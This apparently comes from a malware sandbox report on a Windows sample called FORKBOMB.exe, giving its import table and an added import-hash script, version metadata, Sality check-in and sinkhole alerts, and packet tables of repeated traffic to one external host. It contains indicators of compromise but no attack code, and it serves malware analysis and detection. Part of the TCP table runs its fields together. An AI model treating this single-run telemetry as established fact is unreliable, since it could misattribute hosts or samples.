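The Import Hash listed further up is a function of this DLL/Import table: pefile's get_imphash() lowercases each library name with its .dll/.ocx/.sys extension removed, pairs it with each lowercased imported function in import-directory order, joins the pairs with commas and takes the MD5. The script below is an added example that reimplements those steps, with this report's import table typed in as constructed input; it is not Joe Sandbox's or pefile's code. It does not carry pefile's ordinal-to-name tables (ordinal imports become ordN), and the digest it produces is not verified here against the report's 5877688b4859ffd051f6be3b8e0cd533; the two agree only when the table is in true import-directory order and every import is by name.

```python
# Added example: recompute a pefile-style import hash from an import table.
import hashlib
from typing import Iterable, List, Tuple, Union


def split_names(csv: str) -> List[str]:
    """Turn the report's comma-separated import list into a list of names."""
    return [name.strip() for name in csv.split(",") if name.strip()]


# Constructed from the DLL/Import table above, in the order the report lists it.
FORK_EXE_IMPORTS: List[Tuple[str, List[str]]] = [
    ("MSVCRT.dll", split_names(
        "memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, "
        "_wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc")),
    ("KERNEL32.dll", split_names(
        "GetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, "
        "WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, "
        "FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, "
        "GetCommandLineW, LoadResource, SizeofResource, FreeResource, "
        "FindResourceW, GetNativeSystemInfo, GetShortPathNameW, "
        "GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, "
        "CloseHandle, LeaveCriticalSection, InitializeCriticalSection, "
        "WaitForSingleObject, TerminateThread, CreateThread, Sleep, "
        "GetProcAddress, GetVersionExW, WideCharToMultiByte, HeapAlloc, "
        "HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, "
        "GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, "
        "GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter, "
        "HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, "
        "GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, "
        "CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, "
        "TlsAlloc, HeapReAlloc, DeleteCriticalSection, "
        "InterlockedCompareExchange, InterlockedExchange, GetLastError, "
        "SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, "
        "RegisterWaitForSingleObject")),
    ("USER32.DLL", split_names(
        "CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, "
        "GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, "
        "LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, "
        "GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, "
        "CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, "
        "TranslateAcceleratorW, TranslateMessage, DispatchMessageW, "
        "DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, "
        "GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos")),
    ("GDI32.DLL", ["GetStockObject"]),
    ("COMCTL32.DLL", ["InitCommonControlsEx"]),
    ("SHELL32.DLL", ["ShellExecuteExW", "SHGetFolderLocation", "SHGetPathFromIDListW"]),
    ("WINMM.DLL", ["timeBeginPeriod"]),
    ("OLE32.DLL", ["CoInitialize", "CoTaskMemFree"]),
    ("SHLWAPI.DLL", split_names(
        "PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, "
        "PathRemoveArgsW, PathRemoveBackslashW")),
]


def normalize_imports(imports: Iterable[Tuple[str, Iterable[Union[str, int]]]]) -> str:
    """Build the string pefile hashes: 'lib.func,lib.func,...' in import order."""
    parts = []
    for library, functions in imports:
        libname = library.lower()
        base, _, ext = libname.rpartition(".")
        if base and ext in ("dll", "ocx", "sys"):
            libname = base                  # "kernel32.dll" -> "kernel32"
        for func in functions:
            # Imports by ordinal have no name. pefile resolves a few libraries
            # from a lookup table; here (and as pefile's fallback) it is "ordN".
            name = f"ord{func}" if isinstance(func, int) else func
            parts.append(f"{libname}.{name.lower()}")
    return ",".join(parts)


def imphash(imports: Iterable[Tuple[str, Iterable[Union[str, int]]]]) -> str:
    """MD5 of the normalized import string, the value pefile reports as imphash."""
    return hashlib.md5(normalize_imports(imports).encode("utf-8")).hexdigest()


if __name__ == "__main__":
    print("imphash:", imphash(FORK_EXE_IMPORTS))
```

Because the digest depends on import order and exact names, builds that link the same imports in the same order share a value, which is what makes imphash useful for clustering samples; a packer stub that imports only LoadLibrary and GetProcAddress collapses many families onto one value, so treat it as a pivot rather than a verdict.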
Description       Data
FileVersion       1.1.1.1
ProductVersion    1.1.1.1
ProductName       Fork
OriginalFilename  FORKBOMB.exe
InternalName      Fork.exe
FileDescription   PC Slower
CompanyName       bakonco.
LegalTrademarks   bakon7651
LegalCopyright    bakon7651 2024 All rights reserved.
Translation       0x0000 0x04e4
Timestamp                        SID      Signature                                                                       Severity  Source IP     Source Port  Dest IP       Dest Port  Protocol
2025-03-16T23:04:30.442279+0100  2803270  ETPRO MALWARE Common Downloader Header Pattern UHCa                             2         192.168.2.9   49683        3.229.117.57  80         TCP
2025-03-16T23:04:30.442279+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49683        3.229.117.57  80         TCP
2025-03-16T23:04:30.443194+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz  1         3.229.117.57  80           192.168.2.9   49683      TCP
2025-03-16T23:04:32.050016+0100  2803270  ETPRO MALWARE Common Downloader Header Pattern UHCa                             2         192.168.2.9   49684        3.229.117.57  80         TCP
2025-03-16T23:04:32.050016+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49684        3.229.117.57  80         TCP
2025-03-16T23:04:33.069551+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49685        3.229.117.57  80         TCP
2025-03-16T23:04:34.249537+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49686        3.229.117.57  80         TCP
2025-03-16T23:04:36.427630+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49687        3.229.117.57  80         TCP
2025-03-16T23:04:38.004184+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49688        3.229.117.57  80         TCP
2025-03-16T23:04:39.615694+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49689        3.229.117.57  80         TCP
2025-03-16T23:04:39.615704+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst  1         3.229.117.57  80           192.168.2.9   49689      TCP
2025-03-16T23:04:40.387921+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49690        3.229.117.57  80         TCP
2025-03-16T23:04:42.547516+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49691        3.229.117.57  80         TCP
2025-03-16T23:04:43.450009+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49692        3.229.117.57  80         TCP
2025-03-16T23:04:44.221151+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49693        3.229.117.57  80         TCP
2025-03-16T23:04:45.214955+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49694        3.229.117.57  80         TCP
2025-03-16T23:04:46.797140+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49696        3.229.117.57  80         TCP
2025-03-16T23:04:47.932507+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49698        3.229.117.57  80         TCP
2025-03-16T23:04:50.169165+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49700        3.229.117.57  80         TCP
2025-03-16T23:04:51.260540+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49704        3.229.117.57  80         TCP
2025-03-16T23:04:54.378866+0100  2018340  ET MALWARE Win32.Sality-GR Checkin                                              1         192.168.2.9   49707        3.229.117.57  80         TCP
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Mar 16, 2025 23:04:29.952701092 CET  49683        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:29.957498074 CET  80           49683      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:29.957911015 CET  49683        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:29.982558012 CET  49683        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:29.987240076 CET  80           49683      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:30.442202091 CET  80           49683      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:30.442279100 CET  49683        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:30.443193913 CET  80           49683      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:30.443394899 CET  49683        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:30.475413084 CET  49683        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:30.480031967 CET  80           49683      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:31.559601068 CET  49684        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:31.564322948 CET  80           49684      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:31.564385891 CET  49684        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:31.564620018 CET  49684        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:31.569283009 CET  80           49684      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:32.049948931 CET  80           49684      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:32.050015926 CET  49684        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:32.050043106 CET  80           49684      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:32.050209999 CET  49684        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:32.060465097 CET  49684        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:32.065495968 CET  80           49684      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:32.587627888 CET  49685        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:32.592561007 CET  80           49685      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:32.592716932 CET  49685        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:32.619930029 CET  49685        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:32.624639034 CET  80           49685      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:33.069434881 CET  80           49685      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:33.069511890 CET  80           49685      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:33.069550991 CET  49685        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:33.069595098 CET  49685        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:33.087145090 CET  49685        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:33.091907024 CET  80           49685      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:33.780139923 CET  49686        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:33.784868956 CET  80           49686      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:33.785062075 CET  49686        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:33.792232037 CET  49686        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:33.798532963 CET  80           49686      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:34.249465942 CET  80           49686      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:34.249536991 CET  49686        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:34.249560118 CET  80           49686      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:34.249624968 CET  49686        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:34.274741888 CET  49686        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:34.279408932 CET  80           49686      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:35.969729900 CET  49687        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:35.974857092 CET  80           49687      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:35.974946976 CET  49687        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:36.026817083 CET  49687        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:36.031763077 CET  80           49687      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:36.427499056 CET  80           49687      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:36.427629948 CET  49687        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:36.427783966 CET  80           49687      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:36.427854061 CET  49687        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:36.442506075 CET  49687        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:36.447163105 CET  80           49687      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:37.522607088 CET  49688        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:37.527482986 CET  80           49688      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:37.527563095 CET  49688        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:37.542903900 CET  49688        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:37.547602892 CET  80           49688      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:38.004046917 CET  80           49688      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:38.004100084 CET  80           49688      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:38.004184008 CET  49688        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:38.133480072 CET  49688        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:38.139015913 CET  80           49688      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:39.145323992 CET  49689        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:39.150074005 CET  80           49689      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:39.150156975 CET  49689        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:39.207050085 CET  49689        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:39.212708950 CET  80           49689      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:39.615609884 CET  80           49689      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:39.615694046 CET  49689        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:39.615704060 CET  80           49689      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:39.615814924 CET  49689        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:39.710997105 CET  49689        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:39.715786934 CET  80           49689      3.229.117.57  192.168.2.9
Mar 16, 2025 23:04:39.716414928 CET  49690        80         192.168.2.9   3.229.117.57
Mar 16, 2025 23:04:39.721141100 CET  80           49690      3.229.117.57  192.168.2.9
                                                                        Mar 16, 2025 23:04:39.721225977 CET4969080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:39.797686100 CET4969080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:39.929034948 CET80496903.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:40.387845993 CET80496903.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:40.387921095 CET4969080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:40.387995005 CET80496903.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:40.388053894 CET4969080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:40.443881989 CET4969080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:40.448570967 CET80496903.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.074883938 CET4969180192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:42.081314087 CET80496913.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.081422091 CET4969180192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:42.143299103 CET4969180192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:42.149465084 CET80496913.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.547389030 CET80496913.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.547410011 CET80496913.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.547516108 CET4969180192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:42.585958004 CET4969180192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:42.590745926 CET80496913.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.969806910 CET4969280192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:42.974533081 CET80496923.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:42.974647045 CET4969280192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.083952904 CET4969280192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.089538097 CET80496923.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:43.449911118 CET80496923.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:43.449961901 CET80496923.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:43.450009108 CET4969280192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.450042009 CET4969280192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.471916914 CET4969280192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.476691961 CET80496923.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:43.755649090 CET4969380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.760952950 CET80496933.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:43.761044025 CET4969380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.821810961 CET4969380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:43.826764107 CET80496933.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:44.221091986 CET80496933.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:44.221151114 CET4969380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:44.221252918 CET80496933.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:44.221371889 CET4969380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:44.261296034 CET4969380192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:44.266181946 CET80496933.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:44.746764898 CET4969480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:44.751620054 CET80496943.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:44.751713991 CET4969480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:44.751832008 CET4969480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:44.756939888 CET80496943.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:45.214785099 CET80496943.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:45.214849949 CET80496943.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:45.214955091 CET4969480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:45.304122925 CET4969480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:45.308959961 CET80496943.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:46.331707954 CET4969680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:46.336448908 CET80496963.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:46.336555958 CET4969680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:46.397324085 CET4969680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:46.402116060 CET80496963.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:46.797034979 CET80496963.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:46.797064066 CET80496963.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:46.797139883 CET4969680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:46.885746956 CET4969680192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:46.890547037 CET80496963.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:47.472486973 CET4969880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:47.477310896 CET80496983.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:47.477607012 CET4969880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:47.492856979 CET4969880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:47.497623920 CET80496983.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:47.932394028 CET80496983.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:47.932418108 CET80496983.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:47.932507038 CET4969880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:47.932507992 CET4969880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:47.954369068 CET4969880192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:47.961185932 CET80496983.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:49.692322969 CET4970080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:49.697433949 CET80497003.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:49.697513103 CET4970080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:49.721376896 CET4970080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:49.726241112 CET80497003.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:50.169111967 CET80497003.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:50.169137001 CET80497003.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:50.169164896 CET4970080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:50.169192076 CET4970080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:50.171643972 CET4970080192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:50.176342964 CET80497003.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:50.780802965 CET4970480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:50.785552025 CET80497043.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:50.785680056 CET4970480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:50.789079905 CET4970480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:50.793745995 CET80497043.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:51.260462046 CET80497043.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:51.260540009 CET4970480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:51.260598898 CET80497043.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:51.260648012 CET4970480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:51.609644890 CET4970480192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:51.615309000 CET80497043.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:53.914643049 CET4970780192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:53.921636105 CET80497073.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:53.921722889 CET4970780192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:53.936327934 CET4970780192.168.2.93.229.117.57
                                                                        Mar 16, 2025 23:04:53.943310022 CET80497073.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:54.378576994 CET80497073.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:54.378607035 CET80497073.229.117.57192.168.2.9
                                                                        Mar 16, 2025 23:04:54.378865957 CET4970780192.168.2.93.229.117.57
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 16, 2025 23:04:25.685231924 CET | 53030 | 6759 | 192.168.2.9 | 46.98.127.9
Mar 16, 2025 23:04:28.427220106 CET | 62618 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:28.848244905 CET | 53 | 62618 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:29.267972946 CET | 61812 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:29.519452095 CET | 53 | 61812 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:29.662575960 CET | 57557 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:29.678014994 CET | 53 | 57557 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:29.744261980 CET | 59410 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:29.938927889 CET | 53 | 59410 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:30.670660019 CET | 62513 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:31.091872931 CET | 53 | 62513 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:31.168420076 CET | 51365 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:31.184340000 CET | 53 | 51365 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:31.346298933 CET | 57147 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:31.353436947 CET | 53 | 57147 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:31.365132093 CET | 53013 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:31.549717903 CET | 53 | 53013 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:34.938630104 CET | 59025 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:34.945987940 CET | 53 | 59025 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:35.376758099 CET | 58017 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:35.386795044 CET | 53 | 58017 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:35.747778893 CET | 59009 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:35.861602068 CET | 53 | 59009 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:36.754764080 CET | 63508 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:36.968828917 CET | 53 | 63508 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:37.166395903 CET | 52106 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:37.175748110 CET | 53 | 52106 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:37.409833908 CET | 62966 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:37.441509008 CET | 53 | 62966 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:40.962907076 CET | 51626 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:41.391596079 CET | 53 | 51626 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:41.616554976 CET | 59420 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:41.635135889 CET | 53 | 59420 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:41.840270042 CET | 57421 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:41.859850883 CET | 53 | 57421 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:42.776067019 CET | 63778 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:42.784107924 CET | 53 | 63778 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:42.867494106 CET | 53642 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:42.920932055 CET | 53 | 53642 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:42.937671900 CET | 56940 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:42.951034069 CET | 53 | 56940 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:45.610960007 CET | 52236 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:45.826522112 CET | 53 | 52236 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:47.300482988 CET | 49335 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:47.314482927 CET | 53 | 49335 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:48.466330051 CET | 57247 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:48.476771116 CET | 53 | 57247 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:48.984642982 CET | 62129 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:49.001082897 CET | 53 | 62129 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:49.761337042 CET | 64985 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:49.768296003 CET | 53 | 64985 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:50.200553894 CET | 55215 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:50.416800976 CET | 53 | 55215 | 1.1.1.1 | 192.168.2.9
Mar 16, 2025 23:04:50.576114893 CET | 54681 | 53 | 192.168.2.9 | 1.1.1.1
Mar 16, 2025 23:04:50.630629063 CET | 53 | 54681 | 1.1.1.1 | 192.168.2.9
